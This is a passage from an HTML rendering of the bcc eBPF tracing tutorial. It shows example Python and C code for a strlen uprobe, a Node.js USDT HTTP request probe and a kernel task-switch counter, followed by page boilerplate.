# sleep until Ctrl-C
|
||
try:
|
||
sleep(99999999)
|
||
except KeyboardInterrupt:
|
||
pass
|
||
|
||
# print output
|
||
print("%10s %s" % ("COUNT", "STRING"))
|
||
counts = b.get_table("counts")
|
||
for k, v in sorted(counts.items(), key=lambda counts: counts[1].value):
|
||
print("%10d \"%s\"" % (v.value, k.c.encode('string-escape')))
|
||
</code></pre>
|
||
<p>Things to learn:</p>
|
||
<ol>
|
||
<li><code>PT_REGS_PARM1(ctx)</code>: This fetches the first argument to <code>strlen()</code>, which is the string.</li>
|
||
<li><code>b.attach_uprobe(name="c", sym="strlen", fn_name="count")</code>: Attach to library "c" (if this is the main program, use its pathname), instrument the user-level function <code>strlen()</code>, and on execution call our C function <code>count()</code>.</li>
|
||
</ol>
|
||
<h3 id="lesson-15-nodejs_http_serverpy"><a class="header" href="#lesson-15-nodejs_http_serverpy">Lesson 15. nodejs_http_server.py</a></h3>
|
||
<p>This program instruments a user statically-defined tracing (USDT) probe, which is the user-level version of a kernel tracepoint. Sample output:</p>
|
||
<pre><code class="language-sh"># nodejs_http_server.py 24728
|
||
TIME(s) COMM PID ARGS
|
||
24653324.561322998 node 24728 path:/index.html
|
||
24653335.343401998 node 24728 path:/images/welcome.png
|
||
24653340.510164998 node 24728 path:/images/favicon.png
|
||
</code></pre>
|
||
<p>Relevant code from <a href="https://github.com/iovisor/bcc/tree/master/examples/tracing/nodejs_http_server.py">examples/tracing/nodejs_http_server.py</a>:</p>
|
||
<pre><code class="language-Python">from __future__ import print_function
|
||
from bcc import BPF, USDT
|
||
import sys
|
||
|
||
if len(sys.argv) < 2:
|
||
print("USAGE: nodejs_http_server PID")
|
||
exit()
|
||
pid = sys.argv[1]
|
||
debug = 0
|
||
|
||
# load BPF program
|
||
bpf_text = """
|
||
#include <uapi/linux/ptrace.h>
|
||
int do_trace(struct pt_regs *ctx) {
|
||
uint64_t addr;
|
||
char path[128]={0};
|
||
bpf_usdt_readarg(6, ctx, &addr);
|
||
bpf_probe_read_user(&path, sizeof(path), (void *)addr);
|
||
bpf_trace_printk("path:%s\\n", path);
|
||
return 0;
|
||
};
|
||
"""
|
||
|
||
# enable USDT probe from given PID
|
||
u = USDT(pid=int(pid))
|
||
u.enable_probe(probe="http__server__request", fn_name="do_trace")
|
||
if debug:
|
||
print(u.get_text())
|
||
print(bpf_text)
|
||
|
||
# initialize BPF
|
||
b = BPF(text=bpf_text, usdt_contexts=[u])
|
||
</code></pre>
|
||
<p>Things to learn:</p>
|
||
<ol>
|
||
<li><code>bpf_usdt_readarg(6, ctx, &addr)</code>: Read the address of argument 6 from the USDT probe into <code>addr</code>.</li>
|
||
<li><code>bpf_probe_read_user(&path, sizeof(path), (void *)addr)</code>: Now the string <code>addr</code> points to into our <code>path</code> variable.</li>
|
||
<li><code>u = USDT(pid=int(pid))</code>: Initialize USDT tracing for the given PID.</li>
|
||
<li><code>u.enable_probe(probe="http__server__request", fn_name="do_trace")</code>: Attach our <code>do_trace()</code> BPF C function to the Node.js <code>http__server__request</code> USDT probe.</li>
|
||
<li><code>b = BPF(text=bpf_text, usdt_contexts=[u])</code>: Need to pass in our USDT object, <code>u</code>, to BPF object creation.</li>
|
||
</ol>
|
||
<h3 id="lesson-16-task_switchc"><a class="header" href="#lesson-16-task_switchc">Lesson 16. task_switch.c</a></h3>
|
||
<p>This is an older tutorial included as a bonus lesson. Use this for recap and to reinforce what you've already learned.</p>
|
||
<p>This is a slightly more complex tracing example than Hello World. This program
|
||
will be invoked for every task change in the kernel, and record in a BPF map
|
||
the new and old pids.</p>
|
||
<p>The C program below introduces a new concept: the prev argument. This
|
||
argument is treated specially by the BCC frontend, such that accesses
|
||
to this variable are read from the saved context that is passed by the
|
||
kprobe infrastructure. The prototype of the args starting from
|
||
position 1 should match the prototype of the kernel function being
|
||
kprobed. If done so, the program will have seamless access to the
|
||
function parameters.</p>
|
||
<pre><code class="language-c">#include <uapi/linux/ptrace.h>
|
||
#include <linux/sched.h>
|
||
|
||
struct key_t {
|
||
u32 prev_pid;
|
||
u32 curr_pid;
|
||
};
|
||
|
||
BPF_HASH(stats, struct key_t, u64, 1024);
|
||
int count_sched(struct pt_regs *ctx, struct task_struct *prev) {
|
||
struct key_t key = {};
|
||
u64 zero = 0, *val;
|
||
|
||
key.curr_pid = bpf_get_current_pid_tgid();
|
||
key.prev_pid = prev->pid;
|
||
|
||
// could also use `stats.increment(key);`
|
||
val = stats.lookup_or_try_init(&key, &zero);
|
||
if (val) {
|
||
(*val)++;
|
||
}
|
||
return 0;
|
||
}
|
||
</code></pre>
|
||
<p>The userspace component loads the file shown above, and attaches it to the
|
||
<code>finish_task_switch</code> kernel function.
|
||
The <code>[]</code> operator of the BPF object gives access to each BPF_HASH in the
|
||
program, allowing pass-through access to the values residing in the kernel. Use
|
||
the object as you would any other python dict object: read, update, and deletes
|
||
are all allowed.</p>
|
||
<pre><code class="language-python">from bcc import BPF
|
||
from time import sleep
|
||
|
||
b = BPF(src_file="task_switch.c")
|
||
b.attach_kprobe(event="finish_task_switch", fn_name="count_sched")
|
||
|
||
# generate many schedule events
|
||
for i in range(0, 100): sleep(0.01)
|
||
|
||
for k, v in b["stats"].items():
|
||
print("task_switch[%5d->%5d]=%u" % (k.prev_pid, k.curr_pid, v.value))
|
||
</code></pre>
|
||
<p>These programs can be found in the files <a href="https://github.com/iovisor/bcc/tree/master/examples/tracing/task_switch.c">examples/tracing/task_switch.c</a> and <a href="https://github.com/iovisor/bcc/tree/master/examples/tracing/task_switch.py">examples/tracing/task_switch.py</a> respectively.</p>
|
||
<h3 id="lesson-17-further-study"><a class="header" href="#lesson-17-further-study">Lesson 17. Further Study</a></h3>
|
||
<p>For further study, see Sasha Goldshtein's <a href="https://github.com/goldshtn/linux-tracing-workshop">linux-tracing-workshop</a>, which contains additional labs. There are also many tools in bcc /tools to study.</p>
|
||
<p>Please read <a href="https://github.com/iovisor/bcc/tree/master/CONTRIBUTING-SCRIPTS.md">CONTRIBUTING-SCRIPTS.md</a> if you wish to contribute tools to bcc. At the bottom of the main <a href="https://github.com/iovisor/bcc/tree/master/README.md">README.md</a>, you'll also find methods for contacting us. Good luck, and happy tracing!</p>
|
||
<h2 id="networking-1"><a class="header" href="#networking-1">Networking</a></h2>
|
||
<p>To do.</p>
|
||
|
||
</main>
|
||
|
||
<nav class="nav-wrapper" aria-label="Page navigation">
|
||
<!-- Mobile navigation buttons -->
|
||
|
||
|
||
<div style="clear: both"></div>
|
||
</nav>
|
||
</div>
|
||
</div>
|
||
|
||
<nav class="nav-wide-wrapper" aria-label="Page navigation">
|
||
|
||
</nav>
|
||
|
||
</div>
|
||
|
||
|
||
|
||
|
||
<script>
|
||
window.playground_copyable = true;
|
||
</script>
|
||
|
||
|
||
<script src="elasticlunr.min.js"></script>
|
||
<script src="mark.min.js"></script>
|
||
<script src="searcher.js"></script>
|
||
|
||
<script src="clipboard.min.js"></script>
|
||
<script src="highlight.js"></script>
|
||
<script src="book.js"></script>
|
||
|
||
<!-- Custom JS scripts -->
|
||
|
||
<script>
|
||
window.addEventListener('load', function() {
|
||
window.setTimeout(window.print, 100);
|
||
});
|
||
</script>
|
||
|
||
</div>
|
||
</body>
|
||
</html>
|